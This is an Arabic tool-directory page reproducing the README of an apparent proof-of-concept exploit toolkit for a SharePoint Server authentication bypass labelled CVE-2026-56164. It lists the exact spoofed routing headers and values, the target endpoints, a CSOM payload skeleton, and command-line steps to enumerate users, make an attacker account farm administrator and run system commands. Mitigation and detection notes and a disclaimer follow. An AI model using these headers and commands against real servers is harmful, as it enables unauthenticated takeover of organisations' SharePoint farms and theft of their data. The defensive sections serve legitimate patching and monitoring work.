Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
POC-CVE-2026-56164-exploit — CVE-2026-56164 هي ثغرة أمنية حرجة تتعلق بغياب المصادقة، وتؤثر على Microsoft SharePoint Server المُثبَّت محليًا (On-Premises). تتيح للمهاجمين عن بُعد غير المصادَق عليهم رفع الامتيازات عبر الشبكة. | Kitploit
أدوات/GitHubGitHub/sam00/poc-cve-2026-56164-exploit
المصادقة والترخيصتصعيد الامتيازاتماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
sam00/poc-cve-2026-56164-exploit

POC-CVE-2026-56164-exploit

CVE-2026-56164 هي ثغرة أمنية حرجة تتعلق بغياب المصادقة، وتؤثر على Microsoft SharePoint Server المُثبَّت محليًا (On-Premises). تتيح للمهاجمين عن بُعد غير المصادَق عليهم رفع الامتيازات عبر الشبكة.

عرض المستودع
2منذ 15 أياملم تتم المراجعة بعد

CVE-2026-56164 — استغلال تجاوز المصادقة في Microsoft SharePoint Server

حرجة (CVSS 9.8) — تصعيد امتيازات بدون مصادقة إلى مسؤول مزرعة الخوادم في Microsoft SharePoint Server

محتويات

  • نظرة عامة
  • تفاصيل الثغرة
  • الإصدارات المتأثرة
  • مخططات البنية
  • هيكل المشروع
  • التثبيت
  • استخدام الماسح — خطوة بخطوة
  • استخدام الأداة الاستغلالية — خطوة بخطوة
  • تصميم الحمولة
  • التخفيف
  • إخلاء المسؤولية

نظرة عامة

تمثل CVE-2026-56164 ثغرة حرجة تتمثل في غياب المصادقة في Microsoft SharePoint Server، وتسمح لمهاجم عن بُعد غير مصادَق برفع صلاحياته إلى مستوى مسؤول مزرعة الخوادم (Farm Administrator). تكمن الثغرة في تجميع Microsoft.Office.Server.UserProfiles الذي يعالج طلبات SOAP على المسار /_vti_bin/client.svc/ProcessQuery.

من خلال حذف ترويسة X-RequestDigest عمدًا وتزويد الطلب بترويسات توجيه محددة، يتراجع الخادم المتأثر إلى سياق أمني مرفوع الصلاحيات بدلاً من رفض الطلب غير المصادَق. يتيح ذلك للمهاجمين المجهولين تعداد مجموعات المواقع والمستخدمين وإعدادات المزرعة، وإضافة مسؤولين، وتنفيذ أوامر.

CISA KEV: هذه الثغرة مُدرجة في كتالوج الثغرات المستغلة المعروفة لدى CISA بسبب استغلال نشط في البيئات الحقيقية.


تفاصيل الثغرة

السبب الجذري

يعالج مُعالِج Microsoft.Office.Server.UserProfiles طلبات SOAP على المسار /_vti_bin/client.svc/ProcessQuery. في ظل الظروف العادية، يتحقق SharePoint من ترويسة X-RequestDigest لتأكيد سياق المصادقة. ومع ذلك، يوجد تجاوز في التحقق:

  1. إذا كانت X-RequestDigest غائبة ووُجدت ترويسات توجيه محددة
  2. يقوم النظام بتقييم معاملات التوجيه ويتراجع إلى حالة افتراضية عالية الامتياز
  3. تتم معالجة الطلب باستخدام بيانات اعتماد على مستوى النظام بدلاً من السياق الأمني للمُستدعي

مسار الكود المُعرَّض للثغرة

root@kitploit:~
// Vulnerable: If digest is missing, handler checks routing headers
if (string.IsNullOrEmpty(digest) && CheckSpecialRoutingHeaders(context)) {
    // Bypasses standard identity validation → elevated admin session
    InitializeElevatedSecurityContext(context);
} else {
    ValidateRequestDigest(digest);  // Normal path
}

الكود المُصحَّح

root@kitploit:~
// Patched: Digest validation is unconditional
if (string.IsNullOrEmpty(digest)) {
    context.Response.StatusCode = 401;
    throw new UnauthorizedAccessException("Missing request digest.");
}
ValidateRequestDigest(digest);
InitializeStandardSecurityContext(context);

مراجع النشرات الأمنية

  • MSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56164
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-56164
  • CISA KEV: https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-56164

الإصدارات المتأثرة

المنتجالإصدارات المتأثرةالإصدار المُصحَّح
SharePoint Enterprise Server 2016جميع إصدارات 16.0.x قبل التحديث16.0.5561.1001
SharePoint Server 2019جميع إصدارات 16.0.x قبل التحديث16.0.10417.20175

غير متأثر: SharePoint Online (Microsoft 365)


مخططات البنية

بنية النظام

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────┐
│                   CVE-2026-56164 Exploit Toolkit                     │
├─────────────────────────────────────────────────────────────────────┤
│                                                                      │
│  ┌────────────┐     ┌─────────────────┐     ┌────────────────────┐  │
│  │  scan.py   │────▶│  HTTP Fingerprint│     │  payload_gen.py    │  │
│  │  Scanner   │     │  + Version Check │     │                    │  │
│  └────────────┘     └─────────────────┘     │  ┌──────────────┐  │  │
│         │                                   │  │ CSOM Payloads│  │  │
│         │  Reports:                         │  │ (detection,  │  │  │
│         │  • SharePoint detected?           │  │  enum,       │  │  │
│         │  • Server version                 │  │  elevate,    │  │  │
│         │  • Vulnerable?                    │  │  execute)    │  │  │
│         │  • Auth bypass confirmed?         │  └──────────────┘  │  │
│         ▼                                   │  ┌──────────────┐  │  │
│  ┌────────────┐     ┌─────────────────┐     │  │ SOAP Payloads│  │  │
│  │ exploit.py │────▶│  HTTP Request   │     │  │ (admin, exec)│  │  │
│  │  Exploit   │     │  Delivery       │     │  └──────────────┘  │  │
│  └────────────┘     └─────────────────┘     │  ┌──────────────┐  │  │
│         │                                   │  │ Bypass       │  │  │
│         │  ┌──────────────────────┐         │  │ Headers      │  │  │
│         ├─▶│ MODE: detect         │         │  │ (routing)    │  │  │
│         │  │ Safe, non-intrusive  │         │  └──────────────┘  │  │
│         │  └──────────────────────┘         │  ┌──────────────┐  │  │
│         │  ┌──────────────────────┐         │  │ HTTP Request │  │  │
│         ├─▶│ MODE: enumerate      │         │  │ Builder      │  │  │
│         │  │ Sites, users, config │         │  └──────────────┘  │  │
│         │  └──────────────────────┘         └────────────────────┘  │
│         │  ┌──────────────────────┐                                 │
│         ├─▶│ MODE: elevate        │     ┌──────────────────────┐    │
│         │  │ Add site/farm admin  │     │ Target SharePoint    │    │
│         │  └──────────────────────┘     │ /_vti_bin/client.svc │    │
│         │  ┌──────────────────────┐     │ /_vti_bin/SPAdmin    │    │
│         └─▶│ MODE: execute        │     └──────────────────────┘    │
│            │ System commands      │                                 │
│            └──────────────────────┘                                 │
│         │  ┌──────────────────────┐                                 │
│         └─▶│ MODE: full           │  detect→enum→elevate→execute    │
│            └──────────────────────┘                                 │
└─────────────────────────────────────────────────────────────────────┘

مخطط تدفق الماسح

root@kitploit:~
┌─────────────┐
│  Start Scan │
└──────┬──────┘
       │
       ▼
┌──────────────────┐     No     ┌─────────────┐
│ Target reachable?│──────────▶│  Skip       │
└──────┬───────────┘            └─────────────┘
       │ Yes
       ▼
┌──────────────────┐
│ Send HTTP GET    │
│ to common ports  │
│ (443,80,8080,    │
│  8443)           │
└──────┬───────────┘
       │
       ▼
┌──────────────────┐     No     ┌─────────────┐
│ SharePoint       │──────────▶│ Not SP      │
│ fingerprint?     │            └─────────────┘
│ (MSST header,    │
│  _vti_bin,       │
│  suitebar, etc.) │
└──────┬───────────┘
       │ Yes
       ▼
┌──────────────────┐
│ Extract version  │
│ from MSST header │
│ / response body  │
└──────┬───────────┘
       │
       ▼
┌──────────────────┐     No     ┌─────────────┐
│ Version in       │──────────▶│ Not         │
│ vulnerable       │            │ vulnerable  │
│ range?           │            └─────────────┘
└──────┬───────────┘
       │ Yes
       ▼
┌──────────────────┐
│ Test auth bypass │
│ (CSOM req w/o    │
│  digest + bypass │
│  headers)        │
└──────┬───────────┘
       │
       ▼
┌──────────────────┐
│ Report:          │
│ • VULNERABLE     │
│ • Version        │
│ • Bypass status  │
│ • SSL cert info  │
└──────────────────┘

مخطط تدفق الاستغلال (السلسلة الكاملة)

root@kitploit:~
┌──────────────────────────────────────────────────────────────────┐
│  FULL EXPLOIT CHAIN                                              │
│                                                                  │
│  1. Detect — Authentication Bypass                               │
│  ┌──────────────────────────────────────────────────────────┐   │
│  │  POST /_vti_bin/client.svc/ProcessQuery                  │   │
│  │  [NO X-RequestDigest]                                    │   │
│  │  X-SharePoint-Authenticated: 1                           │   │
│  │  X-SP-RequestRights: FullControl                         │   │
│  │  SPHomeBearerHint: farmadmin                             │   │
│  │  Body: CSOM detection payload                            │   │
│  │                                                          │   │
│  │  → If 200: AUTH BYPASS CONFIRMED                         │   │
│  │  → If 401: Not vulnerable                                │   │
│  └──────────────────────────────────────────────────────────┘   │
│                           │                                      │
│  2. Enumerate            ▼                                      │
│  ┌──────────────────────────────────────────────────────────┐   │
│  │  Enumerate site collections (URL, owner, status)         │   │
│  │  Enumerate users (account, display name, email, admin)   │   │
│  │  Retrieve farm config (DB name, server, farm ID)         │   │
│  └──────────────────────────────────────────────────────────┘   │
│                           │                                      │
│  3. Elevate             ▼                                      │
│  ┌──────────────────────────────────────────────────────────┐   │
│  │  SetIsSiteAdmin(true) → Current context = Site Admin     │   │
│  │  AddUserToWeb → Add specific user as Farm Administrator  │   │
│  └──────────────────────────────────────────────────────────┘   │
│                           │                                      │
│  4. Execute             ▼                                      │
│  ┌──────────────────────────────────────────────────────────┐   │
│  │  POST /_vti_bin/SharePointAdmin.asmx                     │   │
│  │  Body: ExecuteCommand SOAP payload                       │   │
│  │  → System command executed with farm-level privileges    │   │
│  └──────────────────────────────────────────────────────────┘   │
└──────────────────────────────────────────────────────────────────┘

هيكل المشروع

root@kitploit:~
POC-CVE-2026-56164-exploit/
├── payload_gen.py      # Payload generation (CSOM, SOAP, bypass headers)
├── scan.py             # Vulnerability scanner (SharePoint detection + version check)
├── exploit.py          # Exploit orchestrator (detect/enumerate/elevate/execute/full)
├── requirements.txt    # Python dependencies
└── README.md           # This file

التثبيت

root@kitploit:~
# Clone the repository
git clone [email protected]:sam00/POC-CVE-2026-56164-exploit.git
cd POC-CVE-2026-56164-exploit

# Install dependencies
pip3 install -r requirements.txt

المتطلبات: Python 3.8+ ومكتبة requests (اختيارية — تُستخدم مكتبة urllib القياسية افتراضيًا).


استخدام الماسح — خطوة بخطوة

يقوم الماسح بإجراء فحوصات آمنة وغير تدخّلية لتحديد خوادم SharePoint المتأثرة بالثغرة.

الخطوة 1: فحص هدف واحد

root@kitploit:~
python3 scan.py --target sharepoint.example.com

سيقوم الماسح بـ:

  • فحص المنافذ الشائعة (443, 80, 8080, 8443)
  • إرسال طلبات HTTP والتحقق من بصمات SharePoint (الترويسات، محتوى النص)
  • استخراج إصدار SharePoint من ترويسة MicrosoftSharePointTeamServices
  • التحقق مما إذا كان الإصدار يقع ضمن النطاقات المتأثرة
  • اختبار تجاوز المصادقة (اختياري)
  • طباعة تقرير ملوّن

الخطوة 2: الفحص باستخدام منفذ محدد

root@kitploit:~
python3 scan.py --target sharepoint.example.com --port 443

الخطوة 3: فحص أهداف متعددة من ملف

أنشئ ملفًا باسم targets.txt:

root@kitploit:~
sharepoint1.example.com
sharepoint2.example.com
10.0.0.5
# Comments are ignored
root@kitploit:~
python3 scan.py --targets targets.txt

الخطوة 4: تخطّي اختبار التجاوز (البصمة فقط)

root@kitploit:~
python3 scan.py --target sharepoint.example.com --no-bypass-test

الخطوة 5: حفظ النتائج بصيغة JSON

root@kitploit:~
python3 scan.py --target sharepoint.example.com --json scan_results.json

ما الذي يكتشفه الماسح


استخدام الأداة الاستغلالية — خطوة بخطوة

تدعم الأداة الاستغلالية خمسة أوضاع متدرجة الشدة.

الوضع 1: الكشف (آمن، غير تدخّلي)

يختبر تجاوز المصادقة من خلال مقارنة طلب عادي (مع digest) بطلب تجاوز (بدون digest + ترويسات توجيه).

root@kitploit:~
python3 exploit.py --target sharepoint.example.com --mode detect

الوضع 2: التعداد (كشف المعلومات)

يستخرج مجموعات المواقع والمستخدمين وإعدادات المزرعة باستخدام تجاوز المصادقة.

root@kitploit:~
python3 exploit.py --target sharepoint.example.com --mode enumerate

الوضع 3: رفع الصلاحيات (تصعيد الامتيازات)

يرفع صلاحيات السياق المجهول الحالي أو مستخدمًا محددًا إلى مسؤول مجموعة مواقع / مسؤول مزرعة خوادم.

root@kitploit:~
# Elevate current context
python3 exploit.py --target sharepoint.example.com --mode elevate

# Elevate specific user
python3 exploit.py --target sharepoint.example.com --mode elevate --login "DOMAIN\\attacker"

الوضع 4: التنفيذ (تنفيذ الأوامر)

ينفّذ أمر نظام عبر خدمة SharePoint Administration SOAP.

root@kitploit:~
python3 exploit.py --target sharepoint.example.com --mode execute --command "whoami"

الوضع 5: السلسلة الكاملة (كشف → تعداد → رفع صلاحيات → تنفيذ)

يشغّل سلسلة الاستغلال الكاملة بالتسلسل.

root@kitploit:~
python3 exploit.py --target sharepoint.example.com --mode full --command "whoami"

الخيارات الشائعة

  • --port / -p: منفذ الهدف (الافتراضي: 443)
  • --http: استخدام HTTP بدلاً من HTTPS
  • --site-url / -s: عنوان URL لموقع SharePoint (الافتراضي: الهدف)
  • --json / -j: حفظ التقرير بصيغة JSON
  • --timeout: مهلة الطلب بالثواني (الافتراضي: 30)

تصميم الحمولة

آلية تجاوز المصادقة

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│  HTTP Request to /_vti_bin/client.svc/ProcessQuery             │
├─────────────────────────────────────────────────────────────────┤
│  POST /_vti_bin/client.svc/ProcessQuery HTTP/1.1              │
│  Host: sharepoint.example.com                                  │
│  Content-Type: text/xml; charset=utf-8                         │
│  [X-RequestDigest: OMITTED]                                    │
│  X-SharePoint-Authenticated: 1                                 │
│  X-SP-RequestRights: FullControl                               │
│  X-SP-RequestRights2: ManageLists, ManageWeb                   │
│  SPHomeBearerHint: farmadmin                                   │
│  X-RequestForceAuthentication: false                           │
│  X-SP-Proxy: internal                                          │
│  X-Forwarded-For: 127.0.0.1                                    │
│  X-Original-URL: /_vti_bin/client.svc/ProcessQuery             │
│                                                                 │
│  [CSOM/SOAP Payload Body]                                      │
└─────────────────────────────────────────────────────────────────┘
         │
         ▼
┌─────────────────────────────────────────────────────────────────┐
│  Vulnerable SharePoint Server                                   │
│                                                                 │
│  1. digest = Headers["X-RequestDigest"]  → NULL                │
│  2. CheckSpecialRoutingHeaders(context)  → TRUE (≥3 headers)   │
│  3. InitializeElevatedSecurityContext()  → FARM ADMIN          │
│  4. Process SOAP request with system-level credentials          │
└─────────────────────────────────────────────────────────────────┘

بنية حمولة CSOM

root@kitploit:~
<?xml version="1.0" encoding="utf-8"?>
<Request xmlns="http://schemas.microsoft.com/sharepoint/clientquery/2009"
         ApplicationName="SharePointExploit"
         LibraryVersion="16.0.0"
         RequestId="{UUID}">
  <Actions>
    [Detection / Enumeration / Elevation actions]
  </Actions>
  <Context>
    <ContextId>Current</ContextId>
    <Version>16.0.0</Version>
    <SiteUrl>{TARGET}</SiteUrl>
  </Context>
</Request>

ترويسات توجيه التجاوز


التخفيف

إجراءات فورية

  1. تطبيق التحديثات الأمنية من Microsoft — ثبّت تحديثات SharePoint لشهر يوليو 2026
  2. تقييد الوصول — اقتصر نقاط اتصال SharePoint على الشبكات الموثوقة فقط
  3. احظر الوصول الخارجي إلى نقاط اتصال /_vti_bin/ عبر قواعد البروكسي العكسي/جدار حماية التطبيقات (WAF)
  4. راقب السجلات بحثًا عن طلبات غير مصادَقة إلى /_vti_bin/client.svc/ProcessQuery

الإصدارات المُصحَّحة

  • SharePoint Enterprise Server 2016: 16.0.5561.1001+
  • SharePoint Server 2019: 16.0.10417.20175+
  • SharePoint Server Subscription Edition: 16.0.19725.20434+

الاكتشاف

  • ابحث عن طلبات POST إلى /_vti_bin/client.svc/ProcessQuery بدون ترويسة X-RequestDigest
  • ابحث عن الطلبات التي تحتوي على ترويسات توجيه تجاوز متعددة (X-SharePoint-Authenticated, SPHomeBearerHint, وغيرها)
  • راقب الإضافات غير المتوقعة لمسؤولي مجموعات المواقع
  • أطلق تنبيهات عند طلبات SOAP إلى /_vti_bin/SharePointAdmin.asmx القادمة من مصادر غير مصادَقة

إخلاء المسؤولية

تُقدَّم هذه الأداة لأغراض الاختبارات الأمنية المصرح بها والتعليم فقط. استخدمها فقط ضد أنظمة تملكها أو لديك إذن كتابي صريح لاختبارها. الاستخدام غير المصرح به ضد الأنظمة الإنتاجية غير قانوني وقد يخالف قوانين مكافحة الاحتيال وإساءة استخدام الحواسيب.

لا يتحمل المؤلفون أي مسؤولية عن إساءة استخدام هذه الأداة. التزم دائمًا بممارسات الإفصاح المسؤول وامتثل للقوانين واللوائح السارية.

تنزيل الأداة
الحقلالقيمة
معرف CVECVE-2026-56164
الخطورةحرجة
CVSS 3.19.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CWECWE-306: غياب المصادقة لوظيفة حرجة
الأثررفع صلاحيات غير مصادَق إلى مسؤول مزرعة الخوادم
حالة الاستغلالاستغلال نشط (CISA KEV)
MITRE ATT&CKT1190 (استغلال تطبيق مواجه للعام)
SharePoint Server Subscription Editionجميع إصدارات 16.0.x قبل التحديث16.0.19725.20434
المؤشرالطريقة
خادم SharePointبصمة ترويسات HTTP (MicrosoftSharePointTeamServices, SPRequestGuid)
إصدار الخادمتحليل الترويسات + تعبيرات regex في نص الاستجابة
الإصدار المتأثرالمقارنة مع الإصدارات المُصحَّحة لـ CVE-2026-56164
تجاوز المصادقةطلب CSOM بدون X-RequestDigest + ترويسات توجيه التجاوز
شهادة SSLالجهة المالكة/المُصدِرة للشهادة لتحديد الهدف
الترويسةالقيمةالغرض
X-SharePoint-Authenticated1ادعاء أن المصادقة تمت بالفعل
X-SP-RequestRightsFullControlطلب صلاحيات تحكم كامل
X-SP-RequestRights2ManageLists, ManageWebصلاحيات إدارة إضافية
SPHomeBearerHintfarmadminتلميح إلى سياق مسؤول المزرعة
X-RequestForceAuthenticationfalseتعطيل المصادقة الإجبارية
X-SP-Proxyinternalادعاء أن المصدر وكيل داخلي
X-Forwarded-For127.0.0.1تزوير المصدر المحلي
X-Original-URL/_vti_bin/client.svc/ProcessQueryتوجيه المسار